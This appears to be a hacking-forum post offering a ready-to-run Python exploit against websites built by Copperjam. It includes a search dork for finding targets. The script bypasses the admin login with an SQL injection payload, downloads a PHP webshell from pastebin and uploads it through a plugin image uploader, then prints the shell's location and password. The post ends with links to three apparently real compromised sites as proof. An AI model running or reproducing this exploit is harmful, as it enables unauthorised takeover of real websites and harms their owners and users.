Created By COPPERJAM Admin Bypass To Shell Upload

COPPERJAM COMPANY SCRIPT EXPLOIT :

Dork in Bing or Google : intext:"created by copperjam" 

AUTO EXPLOIT :>
/////////////////////////////////////////////////////////

#!/usr/bin/python3 

# Exploit Author: B14ck_dz
# Vendor : Copperjam.com
# Tested on: Ubuntu / Windows 10
# Date: 6/02/2022

import time, argparse, requests, sys
from os import remove
from bs4 import BeautifulSoup
from colorama import init
from colorama import Fore
from colorama import Back
from colorama import Style

init(autoreset=True)

print("""
Sites Created By COPPERJAM Shell Uploader\n
Written by B14ck_dz
Twitter : https://twitter.com/oussama1337
Zone-H 	: http://zone-h.org/archive/notifier=B14ck_dz
Discord : https://discord.gg/A8ptg8Dbu4\n""")

def my_args():
	parser = argparse.ArgumentParser()
	parser.add_argument("-u","--url",type=str,required=True,help="url of target")
	my_arguments = parser.parse_args()
	return my_arguments

headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36"}

def exploit():
	try:
		
		url = my_args().url
		if url.endswith('/'):
			url = url[:-1]

		login_data = {
		'Email' : "' OR ''='",
		'Password' : "' OR ''='"
		}

		with requests.Session() as s:
			login_path = f"{url}/admin/Login/process/"
			r = s.post(login_path,headers=headers,data=login_data)
		print( Fore.GREEN + "[+] Logged in succesfully")
	
	except Exception:
		print(Fore.RED + f"[!] Make Sure You Entred URL Correctly")
		print("Example : http://target.com")
		sys.exit(1)
	
	#soup = BeautifulSoup(r.content, 'html5lib')
	#print(soup)

	#proxies = {"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"}


	phpwebshell = requests.get("https://pastebin.com/raw/119SZL4p", 'html.parser')

	phpfile = open('tmp.php', 'w')
	phpfile.write(str(phpwebshell.text))
	phpfile.close()
	files = {'file': open('tmp.php', 'rb')}

	r = s.post(f"{url}/admin/plugins/data_manage_v02/php/cj-image-uploader.php?folderpath=Li9kYXRhL2FwcC8=&pluginpath=Li4vLi4vcGx1Z2lucy9kYXRhX21hbmFnZV92MDIv&extension=cGhw&tagname=", headers=headers, files=files)

	soup = BeautifulSoup(r.content, 'html5lib')
	result = [soup.body.string]

	try:
		if "php" in result[0]:
			try:
				phpshell = result[0][27:result[0].find("php")+3]
			except:
				print(result)
		else:
			print(Fore.RED + "\nExploit Didn't Work :'(")
			sys.exit(1)

	except : 
		print(Fore.RED + "I Didn't Find The Required Files to Exploit :'( ")
		print("You Can Try it Manualy : ")
		print(f"Admin Panel : {url}/admin/index.php")
		print(f"User: {Fore.GREEN}'OR ''='")
		print(f"Pass: {Fore.GREEN}'OR ''='")
		sys.exit(1)

	print(f"{url}/admin/data/app/{phpshell}")
	print(f"Shell Password : {Fore.RED} root")
	remove('tmp.php')

exploit()

//////////////////////////////////////////////////////////////

POC :
https://www.trimacppl.com/b14ck.php
https://sarvodayafoundation.org/admin/b14ck.php
https://housepital.in/b14ck.php

HAPPY HACKING DON'T FORGET TO JOIN MY DISCORD SERVER :)